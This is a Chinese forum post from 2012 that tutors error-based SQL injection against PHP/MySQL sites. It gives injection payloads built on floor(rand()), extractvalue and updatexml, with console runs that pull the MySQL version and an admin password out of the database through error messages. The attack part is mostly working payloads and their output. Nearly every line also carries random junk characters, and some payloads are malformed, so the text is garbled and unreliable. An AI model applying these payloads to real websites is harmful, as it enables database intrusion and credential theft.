放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
0 m2 f/ c" p' v. K实际测试环境:: Y$ }7 D5 D, C, D) ?! N
7 D2 {; |! K$ \" t, t: m2 X
# z. d/ U ^# t* b' s) R9 O/ N( Kmysql> show tables;6 Q5 a" I/ i2 `
+----------------+
3 Z5 b3 S# U$ k+ e| Tables_in_test |
5 O7 @2 W% v7 F4 ^" Y+----------------+/ h: o" E0 A* B4 N* ]( [
| admin |
$ u" Q, U* I8 F. f| article |
1 {8 X# @/ \4 x% p+----------------+
; r- r3 w! \3 j7 z
) k$ S4 e' b9 H# s' \ D+ M5 m
0 [' e( f1 f0 b/ ~$ I, x) @ 4 _% B+ I7 b4 {, S+ O4 @
mysql> describe admin;
+ h* M" _, n/ v3 R% v+-------+------------------+------+-----+---------+----------------+' B4 m( i8 q9 R4 D& x! d1 s
| Field | Type | Null | Key | Default | Extra |
% V. j6 n2 p& H* L+ Z1 b2 h2 ~. C9 I+-------+------------------+------+-----+---------+----------------+
S( U& d7 C% V2 B1 N9 \$ z| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" z9 I n7 _9 u
| user | varchar(50) | NO | | NULL | |: p: k" j# G% G' }2 M
| pass | varchar(50) | NO | | NULL | |+ [% J- v {6 C: j" h2 ? B
+-------+------------------+------+-----+---------+----------------+! L5 `; i+ z: m) e" ?
& U4 j* g/ d0 t
2 {: U9 B- o9 E/ M9 L 5 l# ]$ b* G/ b% E* }4 m
mysql> describe article;
" ?; ?! B* K* {2 P+---------+------------------+------+-----+---------+----------------+% A+ l9 M0 A3 l; r3 u2 ~/ ^5 Y
| Field | Type | Null | Key | Default | Extra |* _% ? a, _* l' i5 L
+---------+------------------+------+-----+---------+----------------+
6 S: G1 V, {$ ^9 a5 L5 l* u1 J) O| id | int(10) unsigned | NO | PRI | NULL | auto_increment |/ V3 I( p* @. p) Z% D3 @, c# p
| title | varchar(50) | NO | | NULL | |
X! G, x S* q+ y8 W/ J| content | varchar(50) | NO | | NULL | |
% r) }* T# S# V+---------+------------------+------+-----+---------+----------------+1 t2 j) U. @: b( M% e4 _+ q9 }$ l
1、通过floor报错# s7 H& w3 C: k" L, c
可以通过如下一些利用代码$ i4 l/ v) u4 Y
1 L N9 l" Y3 \, }
6 q3 z6 Y& o' M& c* n
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x& i n! s- V' Y4 D- ?- u d
from information_schema.tables group by x)a);* i+ V/ p0 k7 F5 }
. s8 A- k+ V+ B! N( J) [4 p/ O
/ E$ ?6 f k# ?. gand (select count(*) from (select 1 union select null union select !1)x
1 N* V, H/ n' W7 Qgroup by concat((select table_name from information_schema.tables limit 1),4 n+ y x% P& H2 G
floor(rand(0)*2)));& Q% ] V; q4 }
举例如下:7 S) }! S9 [* R" {! h
首先进行正常查询:- F; H: O% r) q+ t7 E" N
}: Y1 h! `6 J7 d" d: G' Gmysql> select * from article where id = 1;3 E0 _. s9 O q! L! d3 v
+----+-------+---------+$ n, ~2 h5 c/ I6 R2 Y
| id | title | content |& X% R( T1 L( @! q" f
+----+-------+---------+
* }# B$ Y- o# c| 1 | test | do it |0 |- _& Y' p, f; K
+----+-------+---------+0 A4 E7 g0 `; I( y! _4 P4 e' K+ @
假如id输入存在注入的话,可以通过如下语句进行报错。2 T+ w6 S5 o, @! X+ s' [
# M' b% G! X9 U$ F4 c0 \& r1 b
1 G# ]4 G) W2 g$ \+ O A4 B
mysql> select * from article where id = 1 and (select 1 from
- z. N( M) H( a(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
7 B) x4 C1 D( J8 E- l1 r1 AERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
; ^2 q2 L4 K9 {6 V可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
0 ]& r8 ~5 v4 U8 m" j4 I4 K8 Q+ g例如我们需要查询管理员用户名和密码:
" D d6 V/ c! f2 q, {6 p* c4 ?8 ~Method1:' ]2 Q. z4 ]% q5 Y( K# O
6 p U+ `. s m0 N7 C6 r6 |0 G
: P" ]0 t! p! n
mysql> select * from article where id = 1 and (select 1 from0 X, U. P, z; G' t
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x6 s; ]7 ], j) l+ m( |1 e
from information_schema.tables group by x)a);
# }- i/ y) X/ ?3 o: q. FERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 }9 l/ l) x8 zMethod2:
0 w% T$ R' Y2 ~; r + P1 X. J+ a" u K
6 E: l6 k, [2 R8 r2 r4 l5 e6 Qmysql> select * from article where id = 1 and (select count(*)' E: z3 D: g; @4 H2 V0 q3 ?
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
8 [8 p2 S- {$ D$ y1 g/ T; R! j. C- Ufloor(rand(0)*2)));
* y8 H8 g9 x2 \: j0 N# C: PERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 }; `6 A2 ~ P
2、ExtractValue
U7 \! n8 R. a测试语句如下
+ E: U! F0 @: k0 U * W2 Q) z5 a$ Z! R" L6 [; D+ W
; z9 l* q1 f3 v' n, W( wand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));3 \; V: ~. U( P- L
实际测试过程) B8 w& m: Q$ Y* e; X+ @$ z
/ b) e' E5 E2 V* O3 y7 a
7 F. R$ w" J% K( ]; u2 o
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
, U+ q8 l+ L, T+ {(select pass from admin limit 1)));--
: K5 ^, e9 `1 H* u( n; b, nERROR 1105 (HY000): XPATH syntax error: '\admin888'# U+ t# P- k, p# l$ M
3、UpdateXml
; N* q5 j9 s" C. d `) V测试语句3 n# F8 P* w/ _' }( k! l6 ?
: _* x& ~% w) h/ A- D
$ D6 s0 k) {& b9 k) F4 V
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
0 d9 y7 _1 D! J5 e. q( d1 L3 S实际测试过程0 l" T: a" W2 x$ ?
- |6 o# u, C# Z/ g" B( e0 I
, }! y. w; [8 l: `
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
$ h2 g4 W3 n. N h& q(select pass from admin limit 1),0x5e24),1));5 r9 a$ a% K/ [+ A
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'7 P- Y2 s$ x. ^+ a' V9 _- u6 b# u8 P
All, thanks foreign guys.9 V% b' `( T+ G4 M
) E! D, I. S- {; G! o
8 P S) b2 v8 ^2 S7 ^6 I |
发表于 2012-12-10 10:28:51
收藏
支持
反对